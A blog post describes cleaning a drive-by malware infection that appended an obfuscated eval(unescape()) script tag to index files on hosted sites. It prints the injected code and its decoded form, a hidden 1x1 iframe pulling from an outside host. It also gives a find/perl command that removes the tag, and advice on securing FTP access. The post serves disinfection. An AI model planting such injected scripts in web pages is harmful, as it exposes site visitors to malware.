Removing uy7gdr5332rkmn malware

Recently I got a mail from my hosting provider that few of my sites were distributing malware. I connected to my server and found out that all the index files had the following script tag appended to them.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

The decoded version of the code is
document.write('<iframe src="http://sedpoo.com/?5589921" width="1" height="1"></iframe>');

Removing the code manually was impossible, since a number of sites were affected and few of the sites had several levels deep directory hierarchy.

Once again unix shell commands came to my rescue. The following command will remove the script from .html, .htm and .php files. If you have other extensions like .tpl modify the command accordingly

find . \( -name "*.html" -o -name "*.htm" -o -name "*.php" \) -print0 | xargs -0 perl -p -i -e "s#<script>eval\(unescape\('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'\)\);</script><\!-- uy7gdr5332rkmn -->##"

Make sure you run the above command from your account root directory (which is usually your FTP user’s home directory), because the malware affects the default error documents too, which are sometimes located outside the document root (In Plesk the document root is ~/httpdocs and the error documents are located in ~/error_docs )

Please keep in mind that your duty doesn’t end with disinfection. The above code will only remove the malicious code from the pages. It will not prevent the files from getting infected again. Most of the times the malware is uploaded via compromised FTP accounts (stolen password / brute forced account). Make sure you change your FTP password. If possible setup password less login via SFTP.